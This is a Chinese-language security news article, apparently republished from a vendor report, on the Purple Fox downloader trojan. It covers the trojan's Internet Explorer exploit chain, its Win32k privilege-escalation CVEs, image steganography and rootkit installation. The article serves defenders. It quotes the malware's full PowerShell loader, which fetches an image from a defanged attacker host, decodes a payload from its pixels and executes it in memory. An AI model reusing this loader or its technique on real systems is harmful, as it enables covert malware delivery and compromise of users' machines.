加入收藏 | 设为首页 | 会员中心 | 我要投稿 济源站长网 (https://www.0391zz.cn/)- 数据工具、数据仓库、行业智能、CDN、运营!
当前位置: 首页 > 服务器 > 安全 > 正文

Purple Fox攻击流程中添加了新的CVE 隐写术和虚拟化技术

发布时间:2021-11-14 07:06:23 所属栏目:安全 来源:互联网
导读:Purple Fox属于一种下载型木马,能够在感染目标计算机后下载其他恶意软件,如加密货币挖矿恶意软件。用户一旦被感染,就将面临各种各样的威胁。 研究人员最近发现攻击者利用Purple Fox攻击工具包攻击易受攻击的Internet Explorer版本的次数激增。 调查显示,P
Purple Fox属于一种下载型木马,能够在感染目标计算机后下载其他恶意软件,如加密货币挖矿恶意软件。用户一旦被感染,就将面临各种各样的威胁。
 
研究人员最近发现攻击者利用Purple Fox攻击工具包攻击易受攻击的Internet Explorer版本的次数激增。
 
调查显示,Purple Fox反复尝试通过公开可用的漏洞利用代码,包括使用两个最新的CVE-CVE-2020-1054和CVE-2019-0808。
 
此外,我们注意到他们的攻击流程发生了其他变化,这些变化使他们可以采用隐写术并通过代码虚拟化技术覆盖恶意代码,从而更好地规避防火墙保护和某些检测工具。
 
在最近几年中,Purple Fox改进了其攻击和传播方法。它最初在2018年9月被发现,Purple Fox在2019年放弃使用NSIS(Nullsoft脚本可安装系统)和Rig漏洞利用工具包,而是采用PowerShell来实现无文件执行。今年早些时候,ProofPoint详细介绍了Purple Fox如何将CVE-2020-0674和CVE-2019-1458添加到其武器库中。研究表明,Purple Fox已再次进行了迭代,添加了更多CVE以实现特权升级,并采用隐写和虚拟化技术来避免检测和妨碍安全人员分析。
 
有效载荷传播流程
 
 
 
在我们观察到的攻击中,通过广告或仅通过单击错误的URL将受害者定向到恶意站点。攻击者将他们的恶意软件托管在speedjudgmentacceleration[.]com上,并针对Internet Explorer用户发起攻击。
 
该漏洞利用VBScript代码作为命令行运行mshta.exe,然后运行PowerShell。 PowerShell代码从http[:]//rawcdn[.]githack[.]cyou/up.php?key=1下载并在内存中执行下一阶段的代码。
 
 
下一阶段将遵循与以前版本的Purple Fox类似的模式,首先检查它是否以管理员权限运行。如果是这样,它将直接从攻击者的站点安装key = 2的MSI软件包。否则,它会尝试几种不同的“本地特权升级”漏洞来首先提升。
 
新特权升级漏洞
 
在最新版本的Purple Fox中,攻击者改进了两点。
 
过去,Purple Fox会下载使用图像文件扩展名(update.jpg)的本地特权升级(local privilege escalation, LPE)二进制文件,但它实际上是一个常规的可执行文件。适当的防火墙规则或安全软件可以很容易地检测到这种技术是恶意的。
 
现在,新版本的漏洞利用工具包将下载实际的映像文件(key = 3和key = 4),并使用隐写术将每个LPE嵌入映像中。下面是一个使用的图像示例:
 
 
下载后,将其提取到内存中。以下代码用于解码和运行有效载荷:
 
$uyxQcl8XomEdJUJd='sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http[:]//rawcdn[.]githack[.]cyou/up.php?key=3"));$o=a Byte[] 589824;(0..575)|%{foreach($x in(0..1023)){$p=$g.GetPixel($x,$_);$o[$_*1024+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..589362]))'
 
IEX ($uyxQcl8XomEdJUJd)
此外,现在正在利用两个新的漏洞来帮助提升本地特权:CVE-2020-1054和CVE-2019-0808。两者都是Win32k组件中的内核漏洞。 CVE-2020-1054于今年5月进行了修补。我们发现利用这些漏洞的攻击者二进制文件分别在2020年8月11日和2020年9月10日进行了编译。
 
该漏洞利用程序包含调试信息和大量信息字符串。例如,CVE-2020-1054上的调试路径为:
 
D:PersonalWindowsWindows10DesktopCVE-2020-1054-masterCVE-2020-1054-masterx64ReleaseCVE-2020-1054.pdb
从编译时的文件夹名称可以看出,该代码来自Git存储库。我们能够快速将漏洞利用追溯到以下公共存储库:CVE-2020-1054,CVE-2019-0808。
 
不幸的是,到目前为止,在野外还没有寻找到更多具有类似特征的二进制文件。
 
值得注意的是,所有的脚本都检查HKCUSoftware7-Zip下一个特定且一致的注册表值“StayOnTop”,设置此值似乎使恶意软件能够确定有效载荷是否成功运行。因此,在计算机注册表中找到该值就可以表示Purple Fox做出了哪些攻击。
 
Rootkit有效载荷
 
PowerShell脚本和特权升级利用的目的最终是在计算机上安装rootkit。如何释放有效载荷和Rootkit组件
 
趋势科技表示,早期版本的“紫狐狸”使用了msi.dll的MsiInstallProductA 函数来下载并执行其有效载荷——一个.msi文件,其中包含加密的shellcode以及32位和64位版本的有效载荷。
 
一旦执行,它将重新启动计算机并使用PendingFileRenameOperations注册表(负责存储操作系统重新启动时将重命名的文件的名称)以重命名其组件。
 
在重新启动计算机后,它将使用其Rootkit功能(隐藏其文件和注册表项)创建一个挂起的svchost进程并注入一个DLL,然后创建一个具有Rootkit功能的驱动程序。
 
在执行有效载荷之前,它还会在注入的DLL中设置以下内容:驱动程序文件(dump_ {random hex} .sys)——负责Rootkit功能,主组件是一个DLL文件(Ms {random hex} App.dll)。
 
然而,与早期版本不同,新版本“紫狐狸”选择了使用开源代码来启用其Rootkit组件,包括隐藏并保护其文件和注册表项。同样值得注意的是,新版本“紫狐狸”还会使用一个文件实用程序软件来隐藏其DLL组件,这阻止了逆向工程或破解尝试。
Purple Fox攻击流程中添加了新的CVE 隐写术和虚拟化技术

(编辑:济源站长网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    热点阅读